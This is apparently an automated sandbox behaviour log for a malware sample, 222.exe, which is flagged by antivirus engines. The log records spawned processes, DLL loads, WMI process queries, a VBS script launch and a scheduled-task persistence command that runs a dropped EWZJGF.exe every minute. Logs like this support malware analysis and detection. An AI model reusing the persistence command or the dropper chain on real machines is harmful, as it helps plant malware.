                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Users\user\Desktop\222.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\222.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 222.exeVirustotal: Detection: 85%
                              Source: 222.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\222.exeFile read: C:\Users\user\Desktop\222.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\222.exe "C:\Users\user\Desktop\222.exe"
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\Users\user\Desktop\._cache_222.exe "C:\Users\user\Desktop\._cache_222.exe"
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\Users\user\Desktop\._cache_222.exe "C:\Users\user\Desktop\._cache_222.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\222.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\222.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
